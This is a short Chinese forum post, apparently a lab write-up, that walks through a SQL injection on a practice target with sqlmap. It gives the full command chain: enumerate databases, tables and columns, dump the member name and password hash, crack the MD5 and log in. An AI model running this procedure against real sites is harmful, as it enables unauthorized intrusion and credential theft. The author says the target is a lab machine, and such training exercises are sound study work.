实战利用sqlmap渗透
使用工具:sqlmap直接sqlmap -u http://219.153.49.228:42300/new_list.php?id=tingjigonggao检测注入点之后
sqlmap -u sqlmap -u sqlmap -u http://219.153.49.228:42300/new_list.php?id=tingjigonggao --dbs
查找数据库发现mozhe_discuz_stormgroup数据库即为我们需要的sqlmap -uhttp://219.153.49.228:42300/new_list.php?id=tingjigonggao -D mozhe_discuz_stormgroup --tables
猜测表名查找到stormgroup_member的表,想必用户信息就在其中sqlmap -u http://219.153.49.228:42300/new_list.php?id=tingjigonggao -D mozhe_discuz_stormgroup -T stormgroup_member --columns
查找字段列名可以很清楚地看到存在name以及password的字段列故sqlmap -u http://219.153.49.228:42300/new_list.php?id=tingjigonggao -D mozhe_discuz_stormgroup -T stormgroup_member -C name,password --dump
查看字段随机看到name为mozhepassword为一串MD5加密代码,解密后即为密码使用name和password登录即可
最后说一句这个是找的靶机,别傻乎乎去瞎找网站扫描
http://cdn.u1.huluxia.com/g3/M01/03/29/wKgBOV6F2h6AVh5vAAAnIr0JqW0568.pnghttp://cdn.u1.huluxia.com/g3/M01/03/29/wKgBOV6F2h-AUHgtAAARPDVwAm8607.pnghttp://cdn.u1.huluxia.com/g3/M01/03/29/wKgBOV6F2iCAMc3EAAAoVz6yxQk542.png
页:
[1]